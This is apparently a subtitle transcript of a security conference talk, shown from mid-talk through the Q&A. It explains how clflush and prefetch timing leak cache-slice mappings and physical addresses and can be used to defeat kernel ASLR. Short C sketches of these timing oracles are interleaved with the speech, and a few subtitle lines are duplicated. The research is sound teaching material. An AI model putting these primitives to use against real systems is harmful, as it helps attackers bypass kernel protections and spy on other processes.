    bit if you have a two-core machine, two
    bits if you have a two-core machine, two
    bits if you have a four-core machine and
  • 31:09 - 31:17
    so on. Now let's go back to clflush, see
    what's the relation with that.
  • 31:17 - 31:21
    So the thing that we noticed is that
    clflush is actually faster to reach a line
  • 31:21 - 31:29
    on the local slice.
    So if you're flushing always
  • 31:29 - 31:33
    one line and you run your program on core
    zero, core one, core two and core three,
  • 31:33 - 31:38
    you will observe that on one core in
    particular, when you run the program on
  • 31:38 - 31:45
    that core, the clflush is faster. And so
    here this is on core one, and you can see
  • 31:45 - 31:51
    that on cores zero, two, and three it's
    a bit slower, and here we can deduce,
  • 31:51 - 31:55
    so we run the program on core one and we
    flush always the same line and we can
  • 31:55 - 32:02
    deduce that the line belongs to slice one.
    And what we can do with that is that we
  • 32:02 - 32:06
    can map physical addresses to slices.
    And that's one way to reverse-engineer
  • 32:06 - 32:11
    this addressing function that was not
    documented.
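
A sketch of that experiment on Linux (illustrative; it reuses timed_clflush from the earlier sketch and assumes, as in the plot, that each core is local to one slice):

    #define _GNU_SOURCE
    #include <sched.h>   /* sched_setaffinity, CPU_SET */
    #include <stdint.h>

    /* Pin the program to each core in turn and time clflush on the
       same line: the core with the lowest time sits next to the
       slice the line maps to. */
    static int guess_slice(volatile uint8_t *line, int ncores, int rounds)
    {
        int best = -1;
        uint64_t best_time = UINT64_MAX;
        for (int core = 0; core < ncores; core++) {
            cpu_set_t set;
            CPU_ZERO(&set);
            CPU_SET(core, &set);
            sched_setaffinity(0, sizeof(set), &set);  /* run here */
            uint64_t sum = 0;
            for (int i = 0; i < rounds; i++) {
                (void)*line;                        /* cache the line */
                sum += timed_clflush((void *)line); /* flush and time */
            }
            if (sum < best_time) { best_time = sum; best = core; }
        }
        return best;
    }
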
  • 32:11 - 32:16
    Funnily enough that's not the only way:
    What I did before that was using the
  • 32:16 - 32:21
    performance counters to reverse-engineer
    this function, but that's actually a whole
  • 32:21 - 32:28
    other story, and if you want more details on
    that, there's also an article on that.
  • 32:28 - 32:30
    ML: So the next instruction we want to
  • 32:30 - 32:35
    talk about is the prefetch instruction.
    And the prefetch instruction is used to
  • 32:35 - 32:41
    tell the CPU: "Okay, please load the data
    I need later on, into the cache, if you
  • 32:41 - 32:46
    have some time." And in the end there are
    actually six different prefetch
  • 32:46 - 32:53
    instructions: prefetcht0 to t2 which
    means: "CPU, please load the data into the
  • 32:53 - 32:59
    first-level cache", or in the last-level
    cache, whatever you want to use, but we
  • 32:59 - 33:02
    spare you the details because it's not so
    interesting in the end.
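
For reference, the variants map to compiler intrinsics roughly like this (a sketch; prefetchw and prefetchwt1, the write-intent variants, are the remaining two of the six mentioned):

    #include <xmmintrin.h>  /* _mm_prefetch */

    void prefetch_variants(const char *p)
    {
        _mm_prefetch(p, _MM_HINT_T0);   /* prefetcht0: all cache levels */
        _mm_prefetch(p, _MM_HINT_T1);   /* prefetcht1: L2 and below */
        _mm_prefetch(p, _MM_HINT_T2);   /* prefetcht2: last-level cache */
        _mm_prefetch(p, _MM_HINT_NTA);  /* prefetchnta: non-temporal */
    }
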
  • 33:02 - 33:07
    However, what's more interesting is when
    we take a look at the Intel manual and
  • 33:07 - 33:12
    what it says there. So, "Using the
    PREFETCH instruction is recommended only
  • 33:12 - 33:17
    if data does not fit in the cache." So you
    can tell the CPU: "Please load data I want
  • 33:17 - 33:23
    to stream into the cache, so it's more
    performant." "Use of software prefetch
  • 33:23 - 33:28
    should be limited to memory addresses that
    are managed or owned within the
  • 33:28 - 33:34
    application context."
    So one might wonder what happens if this
  • 33:34 - 33:41
    address is not managed by myself. Sounds
    interesting. "Prefetching to addresses
  • 33:41 - 33:46
    that are not mapped to physical pages can
    experience non-deterministic performance
  • 33:46 - 33:52
    penalty. For example specifying a NULL
    pointer as an address for prefetch can
  • 33:52 - 33:56
    cause long delays."
    So we don't want to do that because our
  • 33:56 - 34:03
    program will be slow. So, let's take a
    look at what they mean by non-deterministic
  • 34:03 - 34:09
    performance penalty, because we want to
    write good software, right? But before
  • 34:09 - 34:13
    that, we have to take a look at a little
    bit more background information to
  • 34:13 - 34:18
    understand the attacks.
    So on modern operating systems, every
  • 34:18 - 34:23
    application has its own virtual address
    space. So at some point, the CPU needs to
  • 34:23 - 34:27
    translate these addresses to the physical
    addresses actually in the DRAM. And for
  • 34:27 - 34:34
    that we have this very complex-looking
    data structure. So we have a 48-bit
  • 34:34 - 34:40
    virtual address, and some of those bits
    mapped to a table, like the PM level 4
  • 34:40 - 34:48
    table, with 512 entries, so depending on
    those bits the CPU knows, at which line he
  • 34:48 - 34:52
    has to look.
    And if there is data there, because the
  • 34:52 - 34:57
    address is mapped, he can proceed and look
    at the page directory, point the table,
  • 34:57 - 35:05
    and so on for the town. So is everything,
    is the same for each level until you come
  • 35:05 - 35:09
    to your page table, where you have
    4-kilobyte pages. So it's in the end not
  • 35:09 - 35:14
    that complicated, but it's a bit
    confusing, because you want to know a
  • 35:14 - 35:20
    physical address, so you have to look it
    up somewhere in the, in the main memory
  • 35:20 - 35:25
    with physical addresses to translate your
    virtual addresses. And if you have to go
  • 35:25 - 35:32
    through all those levels, it needs a long
    time, so we can do better than that and
  • 35:32 - 35:39
    that's why Intel introduced additional
    caches, also for all of those levels. So,
  • 35:39 - 35:46
    if you want to translate an address, you
    take a look at the ITLB for instructions,
  • 35:46 - 35:51
    and the data TLB for data. If it's there,
    you can stop, otherwise you go down all
  • 35:51 - 35:59
    those levels and if it's not in any cache
    you have to look it up in the DRAM. In
  • 35:59 - 36:03
    addition, the address space you have is
    shared, because you have, on the one hand,
  • 36:03 - 36:07
    the user memory and, on the other hand,
    you have mapped the kernel for convenience
  • 36:07 - 36:13
    and performance also in the address space.
    And if your user program wants to access
  • 36:13 - 36:18
    some kernel functionality like reading a
    file, it will switch to the kernel memory
  • 36:18 - 36:24
    there's a privilege escalation, and then
    you can read the file, and so on. So,
  • 36:24 - 36:30
    that's it. However, you have drivers in
    the kernel, and if you know the addresses
  • 36:30 - 36:36
    of those drivers, you can do code-reuse
    attacks, and as a countermeasure, they
  • 36:36 - 36:40
    introduced address-space layout
    randomization, also for the kernel.
  • 36:40 - 36:47
    And this means that when you have your
    program running, the kernel is mapped at
  • 36:47 - 36:52
    one address and if you reboot the machine
    it's not on the same address anymore but
  • 36:52 - 36:58
    somewhere else. So if there is a way to
    find out at which address the kernel is
  • 36:58 - 37:04
    loaded, you have circumvented this
    countermeasure and defeated kernel address
  • 37:04 - 37:11
    space layout randomization. So this would
    be nice for some attacks. In addition,
  • 37:11 - 37:17
    there's also the kernel direct physical
    map. And what does this mean? It's
  • 37:17 - 37:23
    implemented on many operating systems like
    OS X, Linux, also on the Xen hypervisor
  • 37:23 - 37:28
    and BSD, but not on Windows. But what it means
  • 37:28 - 37:34
    is that the complete physical memory is
    mapped additionally in the kernel
  • 37:34 - 37:40
    memory at a fixed offset. So, for every
    page that is mapped in the user space,
  • 37:40 - 37:45
    there's something like a twin page in the
    kernel memory, which you can't access
  • 37:45 - 37:50
    because it's in the kernel memory.
    However, we will need it later, because
  • 37:50 - 37:58
    now we go back to prefetch and see what we
    can do with that. So, prefetch is not a
  • 37:58 - 38:04
    usual instruction, because it just tells
    the CPU "I might need that data later on.
  • 38:04 - 38:10
    If you have time, load for me," if not,
    the CPU can ignore it because it's busy
  • 38:10 - 38:16
    with other stuff. So, there's no necessity
    that this instruction is really executed,
  • 38:16 - 38:22
    but most of the time it is. And a nice,
    interesting thing is that it generates no
  • 38:22 - 38:29
    faults, so whatever you pass to this
    instruction, your program won't crash, and
  • 38:29 - 38:34
    it does not check any privileges, so I can
    also pass a kernel address to it and it
  • 38:34 - 38:38
    won't say "No, stop, you accessed an
    address that you are not allowed to
  • 38:38 - 38:46
    access, so I crash," it just continues,
    which is nice.
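
This fault-free behavior is simple to check (a sketch; the literal value is just an example of a kernel-space address that a normal load would crash on):

    #include <xmmintrin.h>  /* _mm_prefetch */

    int main(void)
    {
        /* A normal dereference of a kernel address would segfault;
           prefetch skips the privilege check and raises no fault. */
        const char *kernel_addr = (const char *)0xffff880000000000ULL;
        _mm_prefetch(kernel_addr, _MM_HINT_T0);
        return 0;  /* the program gets here unharmed */
    }
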
  • 38:46 - 38:50
    The second interesting thing is that the
    operand is a virtual address, so every
  • 38:50 - 38:56
    time you execute this instruction, the CPU
    has to go and check "OK, what physical
  • 38:56 - 39:00
    address does this virtual address
    correspond to?" So it has to do the lookup
  • 39:00 - 39:06
    with all those tables we've seen earlier,
    and as you probably have guessed already,
  • 39:06 - 39:10
    the execution time varies also for the
    prefetch instruction and we will see later
  • 39:10 - 39:16
    on what we can do with that.
    So, let's get back to the direct physical
  • 39:16 - 39:23
    map. Because we can create an oracle for
    address translation, so we can find out
  • 39:23 - 39:28
    what physical address belongs to the
    virtual address. Because nowadays you
  • 39:28 - 39:32
    don't want the user to know, because
    you can craft nice rowhammer attacks with
  • 39:32 - 39:38
    that information, and more advanced cache
    attacks, so you restrict this information
  • 39:38 - 39:44
    to the user. But let's check if we find a
    way to still get this information. So, as
  • 39:44 - 39:50
    I've told you earlier, if you have a
    page mapped in the user space,
  • 39:50 - 39:55
    you have the twin page in the kernel
    space, and if it's cached,
  • 39:55 - 39:57
    it's cached for both of them again.
  • 39:57 - 40:03
    So, the attack now works as follows:
    From the attacker you flush your user
  • 40:03 - 40:10
    space page, so it's not in the cache,
    not for the kernel memory either, and
  • 40:10 - 40:16
    then you call prefetch on the address of
    the kernel, because as I told you, you
  • 40:16 - 40:22
    still can do that because it doesn't
    create any faults. So, you tell the CPU
  • 40:22 - 40:28
    "Please load me this data into the cache
    even if I don't have access to this data
  • 40:28 - 40:33
    normally."
    And if we now measure on our user space
  • 40:33 - 40:37
    page the address again, and we measure a
    cache hit, because it has been loaded by
  • 40:37 - 40:43
    the CPU into the cache, we know exactly at
    which position, since we passed the
  • 40:43 - 40:48
    address to the function, this address
    corresponds to. And because this is at a
  • 40:48 - 40:53
    fixed offset, we can just do a simple
    subtraction and know the physical address
  • 40:53 - 40:59
    again. So we have a nice way to find
    physical addresses for virtual addresses.
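
Put together, the oracle might be sketched like this (illustrative; DIRECT_MAP_BASE stands for the OS-specific fixed offset of the direct physical map and is an assumption here, and timed_access and the intrinsics are the same as in the earlier sketches):

    #include <stdint.h>
    #include <emmintrin.h>  /* _mm_clflush */
    #include <xmmintrin.h>  /* _mm_prefetch */

    #define DIRECT_MAP_BASE 0xffff880000000000ULL  /* assumed, per-OS */

    /* For each candidate physical address: flush the user page,
       prefetch its would-be twin in the direct map, reload the user
       page. A cache hit means the guess was right. */
    static uint64_t translate(volatile uint8_t *user_page,
                              uint64_t max_phys, uint64_t threshold)
    {
        for (uint64_t phys = 0; phys < max_phys; phys += 4096) {
            const char *twin = (const char *)(DIRECT_MAP_BASE + phys);
            _mm_clflush((void *)user_page);   /* line out of the cache */
            _mm_prefetch(twin, _MM_HINT_T0);  /* CPU caches the twin */
            if (timed_access(user_page) < threshold)
                return phys;  /* hit: twin - DIRECT_MAP_BASE = phys */
        }
        return (uint64_t)-1;  /* not found */
    }
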
  • 40:59 - 41:04
    And in practice this looks like the
    following plot. So, it's pretty simple,
  • 41:04 - 41:09
    because we just do this for every address,
    and at some point we measure a cache hit.
  • 41:09 - 41:14
    So, there's a huge difference. And exactly
    at this point we know this physical
  • 41:14 - 41:20
    address corresponds to our virtual
    address. The second thing is that we can
  • 41:20 - 41:27
    exploit the timing differences it needs
    for the prefetch instruction. Because, as
  • 41:27 - 41:32
    I told you, when you go down this cache
    levels, at some point you see "it's here"
  • 41:32 - 41:38
    or "it's not here," so it can abort early.
    And with that we can know exactly
  • 41:38 - 41:42
    when the prefetch
    instruction aborted, and know how the
  • 41:42 - 41:48
    pages are mapped into the address space.
    So, the timing depends on where the
  • 41:48 - 41:57
    translation stops. And using those two
    properties and those information, we can
  • 41:57 - 42:02
    do the following: On the one hand, we can
    build variants of cache attacks. So,
  • 42:02 - 42:07
    instead of Flush+Reload, we can do
    Flush+Prefetch, for instance. We can
  • 42:07 - 42:12
    also use prefetch to mount rowhammer
    attacks on privileged addresses, because
  • 42:12 - 42:18
    it doesn't raise any faults when we pass
    those addresses, and it works as well. In
  • 42:18 - 42:23
    addition, we can use it to recover the
    translation levels of a process, which you
  • 42:23 - 42:28
    could do earlier with the page map file,
    but as I told you it's now privileged, so
  • 42:28 - 42:33
    you don't have access to that, and by
    doing that you can bypass address space
  • 42:33 - 42:38
    layout randomization. In addition, as I
    told you, you can translate virtual
  • 42:38 - 42:44
    addresses to physical addresses, which is
    now also privileged with the page map
  • 42:44 - 42:49
    file, and using that it re-enables ret2dir
    exploits, which have been
  • 42:49 - 42:56
    demonstrated last year. On top of that, we
    can also use this to locate kernel
  • 42:56 - 43:01
    drivers, as I told you. It would be nice
    if we can circumvent KASLR as well, and I
  • 43:01 - 43:08
    will show you now how this is possible.
    So, with the first oracle we find out all
  • 43:08 - 43:15
    the pages that are mapped, and for each of
    those pages, we evict the translation
  • 43:15 - 43:18
    caches, and we can do that by either
    calling sleep,
  • 43:18 - 43:24
    which schedules another program, or accessing
    just a large memory buffer. Then, we
  • 43:24 - 43:28
    perform a syscall to the driver. So,
    there's code of the driver executed and
  • 43:28 - 43:34
    loaded into the cache, and then we just
    measure the time prefetch takes on this
  • 43:34 - 43:41
    address. And in the end, the fastest
    average access time is the driver page.
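
In code, the search loop just described might look like this (a sketch; evict_translation_caches and timed_prefetch are assumed helper routines, the ioctl request is a placeholder, and a real attack averages several rounds per address):

    #include <stdint.h>
    #include <sys/ioctl.h>

    /* For each candidate kernel address: evict the translation caches,
       run driver code via a syscall, then time a prefetch of the
       candidate. The lowest time marks the driver's page. */
    static uintptr_t find_driver(uintptr_t start, uintptr_t end, int fd)
    {
        uintptr_t best = 0;
        uint64_t best_time = UINT64_MAX;
        for (uintptr_t addr = start; addr < end; addr += 4096) {
            evict_translation_caches();  /* e.g. touch a large buffer */
            ioctl(fd, 0, 0);             /* placeholder syscall to driver */
            uint64_t t = timed_prefetch((const char *)addr);
            if (t < best_time) { best_time = t; best = addr; }
        }
        return best;
    }
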
  • 43:41 - 43:47
    So, we can mount this attack on Windows 10
    in less than 12 seconds. So, we can defeat
  • 43:47 - 43:52
    KASLR in less than 12 seconds, which is
    very nice. And in practice, the
  • 43:52 - 43:58
    measurements look like the following: So,
    we have a lot of long measurements, and at
  • 43:58 - 44:05
    some point you have a low one, and you
    know exactly that this is the driver region and
  • 44:05 - 44:10
    the address where the driver is located. And
    you can mount those ret2dir
    attacks again. However, that's not
    attacks again. However, that's not
    everything, because there are more
  • 44:16 - 44:21
    instructions in Intel.
    CM: Yeah, so, the following is not our
  • 44:21 - 44:24
    work, but we thought that would be
    interesting, because it's basically more
  • 44:24 - 44:31
    instructions, more attacks, more fun. So
    there's the RDSEED instruction, and what
  • 44:31 - 44:35
    it does is request a random seed from
    the hardware random number generator. So,
  • 44:35 - 44:39
    the thing is that there is a fixed number
    of precomputed random bits, and that takes
  • 44:39 - 44:44
    time to regenerate them. So, as with everything
    that takes time, you can create a covert
  • 44:44 - 44:50
    channel with that. There is also FADD and
    FMUL, which are floating point operations.
  • 44:50 - 44:57
    Here, the running time of these instructions
    depends on the operands. Some people
  • 44:57 - 45:02
    managed to bypass Firefox's same origin
    policy with an SVG filter timing attack
  • 45:02 - 45:09
    with that. There's also the JMP
    instructions. So, in modern CPUs you have
  • 45:09 - 45:15
    branch prediction, and branch target
    prediction. With that, it's actually been
  • 45:15 - 45:18
    studied a lot, you can create a covert
    channel. You can do side-channel attacks
  • 45:18 - 45:26
    on crypto. You can also bypass KASLR, and
    finally, there are TSX instructions, which
  • 45:26 - 45:31
    is an extension for hardware transactional
    memory support, which has also been used
  • 45:31 - 45:37
    to bypass KASLR. So, in case you're not
    sure, KASLR is dead. You have lots of
  • 45:37 - 45:46
    different things to read. Okay, so, on the
    conclusion now. So, as you've seen, it's
  • 45:46 - 45:50
    actually more a problem of CPU design,
    than really the instruction set
  • 45:50 - 45:56
    architecture. The thing is that all these
    issues are really hard to patch. They
  • 45:56 - 46:00
    are all linked to performance
    optimizations, and we are not getting rid
  • 46:00 - 46:04
    of performance optimization. That's
    basically a trade-off between performance
  • 46:04 - 46:12
    and security, and performance seems to
    always win. There have been some
  • 46:12 - 46:21
    propositions against cache attacks,
    to, let's say, remove the CLFLUSH
  • 46:21 - 46:27
    instructions. The thing is that all these
    quick fixes won't work, because we always
  • 46:27 - 46:31
    find new ways to do the same thing without
    these precise instructions and also, we
  • 46:31 - 46:37
    keep finding new instructions that leak
    information. So, it's really, let's say
  • 46:37 - 46:44
    quite a big topic that we have to fix.
    So, thank you very much for your
  • 46:44 - 46:47
    attention. If you have any questions we'd
    be happy to answer them.
  • 46:47 - 46:53
    applause
  • 46:53 - 47:02
    applause
    Herald: Okay. Thank you very much again
  • 47:02 - 47:07
    for your talk, and now we will have a Q&A,
    and we have, I think, about 15 minutes, so
  • 47:07 - 47:11
    you can start lining up behind the
    microphones. They are in the gangways in
  • 47:11 - 47:18
    the middle. Except, I think that one...
    oh, no, it's back up, so it will work. And
  • 47:18 - 47:22
    while we wait, I think we will take
    questions from our signal angel, if there
  • 47:22 - 47:29
    are any. Okay, there aren't any, so...
    microphone questions. I think, you in
  • 47:29 - 47:33
    front.
    Microphone: Hi. Can you hear me?
  • 47:33 - 47:40
    Herald: Try again.
    Microphone: Okay. Can you hear me now?
  • 47:40 - 47:46
    Okay. Yeah, I'd like to know what exactly
    was your stealthiness metric? Was it that
  • 47:46 - 47:51
    you can't distinguish it from a normal
    process, or...?
  • 47:51 - 47:56
    CM: So...
    Herald: Wait a second. We have still Q&A,
  • 47:56 - 48:00
    so could you quiet down a bit? That would
    be nice.
  • 48:00 - 48:08
    CM: So, the question was about the
    stealthiness metric. Basically, we use the
  • 48:08 - 48:14
    metric with cache misses and cache
    references, normalized by the instructions
  • 48:14 - 48:21
    TLB events, and we
    just found the threshold under which
  • 48:21 - 48:26
    pretty much every benign application was
    below this, and rowhammer and cache
  • 48:26 - 48:31
    attacks were above it. So we fixed the
    threshold, basically.
  • 48:31 - 48:36
    H: That microphone.
    Microphone: Hello. Thanks for your talk.
  • 48:36 - 48:43
    It was great. First question: Did you
    inform Intel before doing this talk?
  • 48:43 - 48:48
    CM: Nope.
    Microphone: Okay. The second question:
  • 48:48 - 48:51
    What's your future plans?
    CM: Sorry?
  • 48:51 - 48:56
    M: What's your future plans?
    CM: Ah, future plans. Well, what would
  • 48:56 - 49:01
    be interesting is that we keep
    finding these more or less by accident, or
  • 49:01 - 49:06
    manually, so having a good idea of what's
    the attack surface here would be a good
  • 49:06 - 49:10
    thing, and doing that automatically would
    be even better.
  • 49:10 - 49:14
    M: Great, thanks.
    H: Okay, the microphone in the back,
  • 49:14 - 49:19
    over there. The guy in white.
    M: Hi. One question. If you have,
  • 49:19 - 49:24
    like, a daemon that randomly invalidates
    some cache lines, would that be a better
  • 49:24 - 49:31
    countermeasure than disabling the caches?
    ML: What was the question?
  • 49:31 - 49:40
    CM: If invalidating cache lines would be
    better than disabling the whole cache. So,
  • 49:40 - 49:43
    I'm...
    ML: If you know which cache lines have
  • 49:43 - 49:47
    been accessed by the process, you can
    invalidate those cache lines before you
  • 49:47 - 49:53
    swap those processes, but it's also a
    trade-off between performance. Like, you
  • 49:53 - 49:58
    can also, if you switch processes, flush
    the whole cache, and then it's empty, and
  • 49:58 - 50:02
    then you don't see any activity anymore,
    but there's also the trade-off of
  • 50:02 - 50:08
    performance with this.
    M: Okay, maybe a second question. If you,
  • 50:08 - 50:12
    there are some ARM architectures
    that have random cache line invalidations.
  • 50:12 - 50:16
    Did you try those, if you can see a
    [unintelligible] channel there.
  • 50:16 - 50:22
    ML: If they're truly random, but probably
    you just have to make more measurements
  • 50:22 - 50:27
    and more measurements, and then you can
    average out the noise, and then you can do
  • 50:27 - 50:30
    these attacks again. It's like, with prime
    and probe, where you need more
  • 50:30 - 50:34
    measurements, because it's much more
    noisy, so in the end you will just need
  • 50:34 - 50:38
    much more measurements.
    CM: So, on ARM, it's supposed to be pretty
  • 50:38 - 50:43
    random. At least it's in the manual, but
    we actually found nice ways to evict cache
  • 50:43 - 50:47
    lines, that we really wanted to evict, so
    it's not actually that pseudo-random.
  • 50:47 - 50:52
    So, even... let's say, if something is
    truly random, it might be nice, but then
  • 50:52 - 50:57
    it's also quite complicated to implement.
    I mean, you probably don't want a random
  • 50:57 - 51:01
    number generator just for the cache.
    M: Okay. Thanks.
  • 51:01 - 51:06
    H: Okay, and then the three guys here on
    the microphone in the front.
  • 51:06 - 51:13
    M: My question is about a detail with the
    keylogger. You could distinguish between
  • 51:13 - 51:18
    space, backspace and alphabet, which is
    quite interesting. But could you also
  • 51:18 - 51:22
    figure out the specific keys that were
    pressed, and if so, how?
  • 51:22 - 51:26
    ML: Yeah, that depends on the
    implementation of the keyboard. But what
  • 51:26 - 51:29
    we did, we used the Android stock
    keyboard, which is shipped with the
  • 51:29 - 51:35
    Samsung, so it's pre-installed. And if you
    have a table somewhere in your code, which
  • 51:35 - 51:40
    says "Okay, if you press this exact
    location or this image, it's an A or it's
  • 51:40 - 51:44
    an B", then you can also do a more
    sophisticated attack. So, if you find any
  • 51:44 - 51:49
    functions or data in the code, which
    directly tells you "Okay, this is this
  • 51:49 - 51:55
    character," you can also spy on the actual
    key characters on the keyboard.
  • 51:55 - 52:03
    M: Thank you.
    M: Hi. Thank you for your talk. My first
  • 52:03 - 52:09
    question is: What can we actually do now,
    to mitigate this kind of attack? By, for
  • 52:09 - 52:12
    example, switching off TSX or using ECC
    RAM.
  • 52:12 - 52:17
    CM: So, I think the very important thing
    to protect would be, like crypto, and the
  • 52:17 - 52:21
    good thing is that today we know how to
    build crypto that is resistant to side-
  • 52:21 - 52:24
    channel attacks. So the good thing would
    be to stop deploying implementations that
  • 52:24 - 52:31
    are known to be vulnerable for 10 years.
    Then things like keystrokes are way harder
  • 52:31 - 52:37
    to protect, so let's say crypto is
    manageable; the whole system is clearly
  • 52:37 - 52:41
    another problem. And you can have
    different types of countermeasure on the
  • 52:41 - 52:46
    hardware side, but that would mean that
    Intel and ARM actually want to fix that,
  • 52:46 - 52:49
    and that they know how to fix that. I
    don't even know how to fix that in
  • 52:49 - 52:56
    hardware. Then on the system side, if you
    prevent some kind of memory sharing, you
  • 52:56 - 52:59
    don't have Flush+Reload anymore,
    and Prime+Probe is much
    noisier, so it would be an improvement.
    noisier, so it would be an improvement.
    M: Thank you.
  • 53:05 - 53:12
    H: Do we have signal angel questions? No.
    OK, then more microphone.
  • 53:12 - 53:17
    M: Hi, thank you. I wanted to ask about
    the way you establish the side-channel
  • 53:17 - 53:23
    between the two processes, because it
    would obviously have to be timed in a way to
  • 53:23 - 53:29
    transmit information between one process
    to the other. Is there anywhere that you
  • 53:29 - 53:33
    documented the whole? You know, it's
    actually almost like the seven layers or
  • 53:33 - 53:37
    something like that. Are there any ways
    that you documented that? It would be
  • 53:37 - 53:40
    really interesting to know how it worked.
    ML: You can find this information in the
  • 53:40 - 53:46
    paper because there are several papers on
    covert channels using that, so the NDSS
  • 53:46 - 53:51
    paper is published in February I guess,
    but the Armageddon paper also includes
  • 53:51 - 53:56
    a covert channel, and you can
    find more information about what the
  • 53:56 - 53:59
    packets look like and how the
    synchronization works in the paper.
  • 53:59 - 54:04
    M: Thank you.
    H: One last question?
  • 54:04 - 54:10
    M: Hi! You mentioned that you used Osvik's
    attack for the AES side-channel attack.
  • 54:10 - 54:17
    Did you solve the AES round detection and
    is it different to some scheduler
  • 54:17 - 54:21
    manipulation?
    CM: So on this one I think we only did
  • 54:21 - 54:24
    some synchronous attack, so we already
    knew when
  • 54:24 - 54:28
    the victim is going to be scheduled and
    we didn't have anything to do with
  • 54:28 - 54:33
    schedulers.
    M: Alright, thank you.
  • 54:33 - 54:37
    H: Are there any more questions? No, I
    don't see anyone. Then, thank you very
  • 54:37 - 54:39
    much again to our speakers.
  • 54:39 - 54:42
    applause
  • 54:42 - 54:59
    music
  • 54:59 - 55:06
    subtitles created by c3subtitles.de
    in the year 2020. Join, and help us!